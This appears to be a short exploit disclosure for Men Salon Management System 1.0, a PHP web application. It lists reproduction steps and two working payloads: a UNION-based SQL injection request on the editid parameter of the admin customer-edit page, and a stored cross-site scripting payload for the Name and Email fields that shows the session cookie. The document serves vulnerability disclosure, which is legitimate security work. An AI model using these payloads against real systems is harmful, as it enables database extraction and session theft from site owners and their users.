# Exploit Title: Men Salon Management System 1.0 - Multiple Vulnerabilities# Date: 2021-09-09# Exploit Author: Aryan Chehreghani# Vendor Homepage: https://phpgurukul.com# Software Link: https://phpgurukul.com/men-salon-management-system-using-php-and-mysql# Version: 1.0# Tested on: Windows 10 - XAMPP Server# Vulnerable page :
http://localhost/msms/admin/edit-customer-detailed.php?editid=# Proof Of Concept :# 1 . Download And install [ Men Salon Management System ]# 2 . Go to /msms/admin/index.php and Enter Username & Password# 3 . Navigate to >> Customer List # 4 . In the action column, click Edit # 5 . Enter the payload into the Url and Fields# [ Sql Injection ] :
Vulnerable paramater :
The editid paramater is Vulnerable to sqli
GET : http://localhost/msms/admin/edit-customer-detailed.php?editid=2'+union+select+1,database(),3,4,5,6,7,8--+# [ Stored Cross-Site Scripting ] :
Vulnerable Fields : Name & Email
Payload Used: "><script>alert(document.cookie)</script>
